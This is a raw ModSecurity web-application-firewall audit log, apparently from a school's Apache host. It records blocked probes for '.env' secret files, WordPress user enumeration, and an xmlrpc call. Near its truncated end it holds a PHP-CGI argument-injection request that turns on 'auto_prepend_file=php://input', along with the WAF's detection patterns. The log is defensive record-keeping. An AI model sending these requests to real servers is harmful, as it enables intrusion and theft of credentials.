Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e8d3b11-Z-- --1838e660-A-- [09/May/2025:15:30:52 +0700] aB29PFqQ1nOVx9fWpZQGWwAAABI 103.236.140.4 35962 103.236.140.4 8181 --1838e660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1838e660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1838e660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779452523880 700 (- - -) Stopwatch2: 1746779452523880 700; combined=290, p1=263, p2=0, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1838e660-Z-- --7ec1762f-A-- [09/May/2025:15:30:52 +0700] aB29PB6q_ZMebht3q16G5QAAAJY 103.236.140.4 35992 103.236.140.4 8181 --7ec1762f-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --7ec1762f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ec1762f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779452893178 826 (- - -) Stopwatch2: 1746779452893178 826; combined=378, p1=336, p2=0, p3=0, p4=0, p5=42, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ec1762f-Z-- --72f19b16-A-- [09/May/2025:15:30:53 +0700] aB29PVoC-7ITMWTA_c-5QwAAANI 103.236.140.4 36018 103.236.140.4 8181 --72f19b16-B-- GET /conf/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --72f19b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f19b16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779453253065 1021 (- - -) Stopwatch2: 1746779453253065 1021; combined=498, p1=451, p2=0, p3=0, p4=0, p5=47, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f19b16-Z-- --56f83245-A-- [09/May/2025:15:30:53 +0700] aB29PVoC-7ITMWTA_c-5RgAAAMA 103.236.140.4 36040 103.236.140.4 8181 --56f83245-B-- POST /conf/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --56f83245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56f83245-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779453610875 829 (- - -) Stopwatch2: 1746779453610875 829; combined=305, p1=264, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56f83245-Z-- --b7529d57-A-- [09/May/2025:15:30:53 +0700] aB29PS-fAO47ojYKsMpPBQAAAEs 103.236.140.4 36070 103.236.140.4 8181 --b7529d57-B-- GET /wp-content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b7529d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7529d57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779453976688 921 (- - -) Stopwatch2: 1746779453976688 921; combined=361, p1=321, p2=0, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7529d57-Z-- --17273438-A-- [09/May/2025:15:30:54 +0700] aB29Ph6q_ZMebht3q16G7gAAAJI 103.236.140.4 36096 103.236.140.4 8181 --17273438-B-- POST /wp-content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --17273438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17273438-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779454338092 795 (- - -) Stopwatch2: 1746779454338092 795; combined=359, p1=324, p2=0, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17273438-Z-- --ddaef972-A-- [09/May/2025:15:30:54 +0700] aB29Ph6q_ZMebht3q16G9AAAAJA 103.236.140.4 36118 103.236.140.4 8181 --ddaef972-B-- GET /wp-admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ddaef972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddaef972-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779454705474 782 (- - -) Stopwatch2: 1746779454705474 782; combined=332, p1=286, p2=0, p3=0, p4=0, p5=45, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddaef972-Z-- --d082fd10-A-- [09/May/2025:15:30:55 +0700] aB29Py-fAO47ojYKsMpPDQAAAEI 103.236.140.4 36148 103.236.140.4 8181 --d082fd10-B-- POST /wp-admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --d082fd10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d082fd10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779455058199 717 (- - -) Stopwatch2: 1746779455058199 717; combined=324, p1=292, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d082fd10-Z-- --61b5071d-A-- [09/May/2025:15:30:55 +0700] aB29Px6q_ZMebht3q16G-AAAAJc 103.236.140.4 36182 103.236.140.4 8181 --61b5071d-B-- GET /library/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --61b5071d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61b5071d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779455413503 792 (- - -) Stopwatch2: 1746779455413503 792; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61b5071d-Z-- --5d705a2f-A-- [09/May/2025:15:30:55 +0700] aB29Px6q_ZMebht3q16G-wAAAII 103.236.140.4 36208 103.236.140.4 8181 --5d705a2f-B-- POST /library/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --5d705a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d705a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779455783671 652 (- - -) Stopwatch2: 1746779455783671 652; combined=259, p1=224, p2=0, p3=0, p4=0, p5=35, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d705a2f-Z-- --db521320-A-- [09/May/2025:15:30:56 +0700] aB29QC-fAO47ojYKsMpPFAAAAE0 103.236.140.4 36234 103.236.140.4 8181 --db521320-B-- GET /new/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --db521320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db521320-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779456151060 881 (- - -) Stopwatch2: 1746779456151060 881; combined=428, p1=389, p2=0, p3=0, p4=0, p5=38, sr=195, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db521320-Z-- --caae4e45-A-- [09/May/2025:15:30:56 +0700] aB29QFoC-7ITMWTA_c-5TAAAANE 103.236.140.4 36264 103.236.140.4 8181 --caae4e45-B-- POST /new/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close Content-Length: 17 User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --caae4e45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caae4e45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779456506023 615 (- - -) Stopwatch2: 1746779456506023 615; combined=244, p1=212, p2=0, p3=0, p4=0, p5=32, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caae4e45-Z-- --73ebfc2d-A-- [09/May/2025:15:30:57 +0700] aB29QS-fAO47ojYKsMpPFQAAAEc 103.236.140.4 36302 103.236.140.4 8181 --73ebfc2d-B-- GET /vendor/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.215.146.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.215.146.7 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --73ebfc2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73ebfc2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746779457094107 781 (- - -) Stopwatch2: 1746779457094107 781; combined=353, p1=319, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73ebfc2d-Z-- --7b9f6648-A-- [09/May/2025:16:02:44 +0700] aB3EtC-fAO47ojYKsMpxEQAAAE0 103.236.140.4 58538 103.236.140.4 8181 --7b9f6648-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.231.130.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.231.130.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7b9f6648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b9f6648-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746781364049862 2855 (- - -) Stopwatch2: 1746781364049862 2855; combined=1239, p1=402, p2=801, p3=0, p4=0, p5=36, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b9f6648-Z-- --fdf69955-A-- [09/May/2025:16:19:16 +0700] aB3IlC-fAO47ojYKsMqEmgAAAFc 103.236.140.4 43746 103.236.140.4 8181 --fdf69955-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.127.222.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.127.222.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fdf69955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdf69955-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746782356497847 2541 (- - -) Stopwatch2: 1746782356497847 2541; combined=1178, p1=429, p2=720, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdf69955-Z-- --9f9cae7b-A-- [09/May/2025:16:24:39 +0700] aB3J1x6q_ZMebht3q169jgAAAJI 103.236.140.4 37826 103.236.140.4 8181 --9f9cae7b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.189.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.189.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9f9cae7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f9cae7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746782679920121 942 (- - -) Stopwatch2: 1746782679920121 942; combined=413, p1=376, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f9cae7b-Z-- --5fb1a74b-A-- [09/May/2025:16:37:18 +0700] aB3MzlqQ1nOVx9fWpZRHSgAAAAQ 103.236.140.4 34464 103.236.140.4 8181 --5fb1a74b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5fb1a74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fb1a74b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746783438795104 3529 (- - -) Stopwatch2: 1746783438795104 3529; combined=1800, p1=496, p2=1268, p3=0, p4=0, p5=35, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fb1a74b-Z-- --d3853607-A-- [09/May/2025:16:37:25 +0700] aB3M1VqQ1nOVx9fWpZRHbAAAAAE 103.236.140.4 34944 103.236.140.4 8181 --d3853607-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3853607-C-- demo.sayHello --d3853607-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3853607-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746783445311162 5396 (- - -) Stopwatch2: 1746783445311162 5396; combined=4117, p1=502, p2=3295, p3=38, p4=53, p5=126, sr=94, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3853607-Z-- --b442b000-A-- [09/May/2025:16:51:39 +0700] aB3QKx6q_ZMebht3q17W5QAAAII 103.236.140.4 38940 103.236.140.4 8181 --b442b000-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --b442b000-C-- --b442b000-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b442b000-E-- --b442b000-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd 